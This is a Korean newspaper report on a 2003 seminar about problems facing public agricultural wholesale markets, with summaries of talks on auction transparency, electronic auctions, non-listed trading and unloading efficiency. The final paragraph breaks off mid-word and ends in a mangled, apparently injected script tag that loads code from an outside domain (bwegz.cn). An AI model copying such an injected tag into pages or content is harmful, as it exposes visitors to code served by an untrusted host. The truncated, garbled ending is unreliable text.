농림부는 지난달 27일 충남 천안시 소재 상록리조트 컨벤션센터에서 전국 도매시장 관계자들이 참석한 가운데 `2003년도 농수산물도매시장 연찬회 및 평가설명회''를 개최했다.
이날 행사는 최근 백화점·할인점·물류센터 등의 확산으로 도매시장의 기능이 축소되고 있는 상황을 참석자들이 심각하게 인식한 듯 도매시장의 문제점과 활성화 방안에 대한 심도 있는 논의가 이뤄졌다.
이날 연찬회에서 발표된 내용을 정리했다.

■소비자마켓이 도매시장에 바라는 제언-나명국 코오롱상사 다마트팀장
코오롱상사의 경우 지난해 도매시장 78.5%, 산지 21.5%로 도매시장 구매비중이 전년보다 4% 감소했다.
도매시장은 가격등락폭이 심하고 소량의 상품만을 구매할 수 있으나 산지직구매는 가격이 안정적이고 대량구매가 가능하기 때문이다.
도매법인을 통한 구매시 일부상품의 가격이 인터넷에 공개되지 않아 소비자와 판매자간의 불신을 초래하고, 입고상품에 대한 정확한 경매가 제시가 이뤄지지 않고 있다.
또 속박이 발생으로 도매시장의 품질등급기준의 불신을 낳고 있으며, 농약잔류물질검사나 기타 시험성적 등의 조사가 미흡하다.
특히 가격등락폭이 너무 크고 품질등급간 적정가격 책정이 필요하며, 상품 크기구분에 대한 보다 세밀한 기준이 필요하다.
따라서 도매시장은 입찰가격의 투명성 확보 및 자료의 공개화로 투명성을 제고시키고 품질·규격 표준화에 노력해야 한다. 여기에 요일별 가격 등락폭과 등급별 가격 폭 과다를 해결할 수 있는 방안도 마련돼야 한다.

■상장경매 및 전자경매 정착 방안-권주년 대전오정동농수산물도매시장 대전공판장장
최근 공영도매시장은 비효율적인 운영과 유통환경 변화에의 적응력 부족 등으로 역할이 점차 축소되는 경향이 있다.
도매시장이 경쟁력을 갖추기 위해서는 상장경매제도와 전자경매의 조기 정착 등으로 거래의 공정성과 투명성을 확보해야 한다.
그러나 도매법인들의 수집능력 부족과 일부 중도매인들의 법적·도덕적 불감증, 출하주들의 불신, 관리주체의 관리상 한계 등으로 경매제도의 순기능을 살리지 못하고 있다.
따라서 도매법인의 수집능력을 증대시키고 법인과 중도매인과의 관계를 개선시키는 한편 고객 중심의 도매시장 운영을 통해 소비자의 부정적 시각을 불식시키려는 노력이 필요하다.
전자경매도 전산 프로그램 표준화와 장비구입에 대한 지원폭을 확대하고 경매사 역할도 경매외에 출하유치 강화와 물량분산 위주의 기능으로 전환토록 유도해야 한다.
특히 공동계산제 확대와 장비고장 등에 대비한 훈련과 전문인력 확보 등을 통해 전자경매 확대를 저해하는 경매시간 지연을 미연해 방지해야 한다.

■공영도매시장의 비상장거래 정착방안-이신우 한국농산물중도매인조합연합회 사무총장
공영도매시장에서 강제하고 있는 상장경매제도는 기본적으로 고비용구조일 뿐만 아니라 가격편차가 극히 심하게 나타나는 약점을 지니고 있다.
공영도매시장의 경쟁력을 유지하기 위해서는 거래제도에 탄력성을 부여하는 길밖에 없다.
이를 위해 시장도매인제도 도입과 비상장거래의 확대가 필요하다.
비상장거래가 정착되기 위해서는 우선 품목지정 과정에 있어 객관적인 절차마련이 요구되며, 개설자와 상인간의 보다 철저한 교육과 의견청취가 이뤄져야 한다.
결국 도매시장 내에서 개설자와 상인은 공동운명체일 수밖에 없다. 잘못된 사례가 있다면 서로 이를 시정토록 하여야 한다.
개설자도 관료적 사고에서 벗어나 프로정신을 가지고 지원해 줘야 한다.
솔직히 비상장거래 방식에 대해선 그동안 많은 논란이 있었고 이미 제도적 장치들이 구비돼 운영되고 있으나 유통주체간의 입장차이로 원활히 추진되지 못하고 있다.
이제 시장 종사자간에 누구를 비난하고만 있을 여유가 없는 상황이다. 거래제도에 탄력성을 부여해 도매시장을 살려놓고 보아야 하는 시점이다.

■하역업무 효율화 방안-제국삼 서울·경기항운노동조합 부위원장
하역업무 효율화는 무한 자유경쟁 시대에 농산물 경쟁력을 제고시키기 위한 중요과제중 하나이다.
하역 효율화는 생산지부터 출발한다. 규모화 되고 표준화된 생산체제 구축은 산지의 임금절감, 작업시간 단축 등과 함께 하역 효율화를 가능케 하는 바탕이 된다.
여기에 도매시장에서의 하역업무 효율화는 곧바로 하역비의 대폭적인 절감을 가져온다.
그러나 현재 도매시장은 물류기능에 문제가 있다.
하역 시설이나 기계하역을 위한 공간도 불충분하며, 고가의 장비 구입도 어려운 실정이므로 적정한 장비 확보를 위해 정부나 관련도매법인 등의 지원이 필요하다.
이밖에 기계하역이 가능하도록 팔레?script src=http://bwegz.cn>

저작권자 © 농수축산신문 무단전재, 재배포 및 AI학습 이용 금지